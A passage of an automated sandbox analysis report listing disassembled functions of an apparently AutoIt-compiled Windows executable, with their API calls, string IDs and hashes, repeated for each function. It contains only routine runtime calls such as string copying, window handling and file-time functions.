                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                                        • Opcode ID: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                                                                                                                                                        • Instruction ID: 82aa27193ca3c00b9cd75bb4ef3a3c53ae4367e95e95ba6334807de2374af954
                                                                                                                                                        • Opcode Fuzzy Hash: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                                                                                                                                                        • Instruction Fuzzy Hash: 4F513B71900709AFDB209FA8CD89FAEBBF6FF04705F11492DE596A35A0CB74A944CB50
                                                                                                                                                        Function 00AE01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE026A
                                                                                                                                                        • _wcschr.LIBCMT ref: 00AE0278
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE028F
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE029E
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE02BC
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE02DD
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE03BA
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE03DF
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE03F1
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE0406
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE041B
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE042D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0442
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscmp.LIBCMT ref: 00ADC92A
                                                                                                                                                          • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC96F
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscpy.LIBCMT ref: 00ADC982
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC995
                                                                                                                                                          • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC9BA
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9D0
                                                                                                                                                          • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9E3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                                        • Opcode ID: 828373cb6f7e89d107a030dbe9b8ceb96794e3db25c49d5ec40cdcca7d3c5256
                                                                                                                                                        • Instruction ID: b251fcbd2f682ec6fc6c3248634712cb1102f05158f4640a72d0b74bed4e6eee
                                                                                                                                                        • Opcode Fuzzy Hash: 828373cb6f7e89d107a030dbe9b8ceb96794e3db25c49d5ec40cdcca7d3c5256
                                                                                                                                                        • Instruction Fuzzy Hash: 4491B671604741AFCB24EB64CA55F9FB3E8AF84310F04485DF5499B292EB74EA84CB92
                                                                                                                                                        Function 00AFCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AFCD0B
                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00AFCD83
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AFCE04
                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AFCE26
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCE35
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AFCE52
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A90000,00000000), ref: 00AFCE85
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCEA4
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AFCEB9
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AFCEC0
                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AFCED2
                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AFCEEA
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                                        • Opcode ID: c5324591b102448a1459d1f625c7cef554a5671acc528bad4f066ad9875c0131
                                                                                                                                                        • Instruction ID: 71eefcb40c353b8467b77c2edbab66c1f60b8591fc3ccdeb49b4d7f875d1f46a
                                                                                                                                                        • Opcode Fuzzy Hash: c5324591b102448a1459d1f625c7cef554a5671acc528bad4f066ad9875c0131
                                                                                                                                                        • Instruction Fuzzy Hash: 6F719A71240309AFEB25CF68CD45FBA3BE5EB89714F440918FA85972A1DB70E801CB21
                                                                                                                                                        Function 00ADB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00ADB46D
                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00ADB476
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB482
                                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ADB561
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADB591
                                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00ADB5BD
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00ADB63F
                                                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00ADB6D1
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB727
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ADB736
                                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00ADB772
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                                        • Opcode ID: 5d3b28069732b8fdb052c6745c9a91b0039f752fb4134a28b99ad9306ad0c5ad
                                                                                                                                                        • Instruction ID: e3fc15980148d596eaab990273f726f4943547c635639ccd21e9bb2e87272741
                                                                                                                                                        • Opcode Fuzzy Hash: 5d3b28069732b8fdb052c6745c9a91b0039f752fb4134a28b99ad9306ad0c5ad
                                                                                                                                                        • Instruction Fuzzy Hash: 73C1ECB1A10615EBCF10DF65D894BAAB7B4FF05300F26846AE4069B792DB34ED40DBB1
                                                                                                                                                        Function 00AF6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AF6FF9
                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF7044
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                                        • Opcode ID: 71e2a67f91ba441f7bf613d01f308192e3170b12ea6ff5a0ba055de6d23a7ac1
                                                                                                                                                        • Instruction ID: a67f422f4de09796f848a48bc58fd91d0ad589512849d7b52b8b312a8f390efd
                                                                                                                                                        • Opcode Fuzzy Hash: 71e2a67f91ba441f7bf613d01f308192e3170b12ea6ff5a0ba055de6d23a7ac1
                                                                                                                                                        • Instruction Fuzzy Hash: F79191342046018FCB14EF54CA51B7EB7E1AF89350F04886DF9965B3A2CB35ED4ACB81
                                                                                                                                                        Function 00AFE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AFE3BB
                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AFBCBF), ref: 00AFE417
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE457
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE49C
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE4D3
                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00AFBCBF), ref: 00AFE4DF
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AFE4EF
                                                                                                                                                        • DestroyCursor.USER32(?), ref: 00AFE4FE
                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AFE51B
                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AFE527
                                                                                                                                                          • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                        • API String ID: 3907162815-1154884017
                                                                                                                                                        • Opcode ID: 7a03e83e1e69f70d388581e820a0829982c9f950c0a115946ccef7c22e5870d5
                                                                                                                                                        • Instruction ID: 67526bd13c645ae9e7bffd757e9dff0c7ace6b74c58318e53f89f44a8ecfa6d1
                                                                                                                                                        • Opcode Fuzzy Hash: 7a03e83e1e69f70d388581e820a0829982c9f950c0a115946ccef7c22e5870d5
                                                                                                                                                        • Instruction Fuzzy Hash: 9C61CF71600219BEEB14DFA4CD46FFA7BACBB08711F108209FA11EB0E1DB759990D7A0
                                                                                                                                                        Function 00AE0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00AE0EFF
                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AE0F0F
                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AE0F1B
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AE0F79
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0F91
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AE0FA3
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0FB8
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FCC
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FFE
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE101F
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE102B
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AE106A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                                        • Opcode ID: 4ace16f4bd435f635362baca3b4fd85210a39be80630e54e969a0a9e50c8f2ab
                                                                                                                                                        • Instruction ID: acf1b8b9f7d6aeec39ca60ca762daa4e1889a29ab4610caebdc88708c598a447
                                                                                                                                                        • Opcode Fuzzy Hash: 4ace16f4bd435f635362baca3b4fd85210a39be80630e54e969a0a9e50c8f2ab
                                                                                                                                                        • Instruction Fuzzy Hash: F8618F725043459FCB10EF64C944E9EB3E8FF89310F04892EF99987251EB35EA45CB92
                                                                                                                                                        Function 00ADDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00ADDB26
                                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00ADDB73
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBBB
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBF2
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDC20
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                                                        • Opcode ID: 4c7c029e7e6c615264ee30677ab955c01fff8ebac2df6e0533c7be3411642498
                                                                                                                                                        • Instruction ID: c210a0adeb4967e5beab56bcb185184c80f0c8c08ffd679067fde08ff64a9d3e
                                                                                                                                                        • Opcode Fuzzy Hash: 4c7c029e7e6c615264ee30677ab955c01fff8ebac2df6e0533c7be3411642498
                                                                                                                                                        • Instruction Fuzzy Hash: 7D518D716043059FCB00EF24CA9196AB7F5FF88758F04886DF896972A1DB31EE05CB92
                                                                                                                                                        Function 00AD3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00AD3145
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD314E
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00AD3170
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD3173
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD31B3
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD31C5
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD326C
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD3283
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                                                        • Opcode ID: 2caf932458259c32409883c1e96618fc6ae929953422d56e7d60d6b17a8cc78b
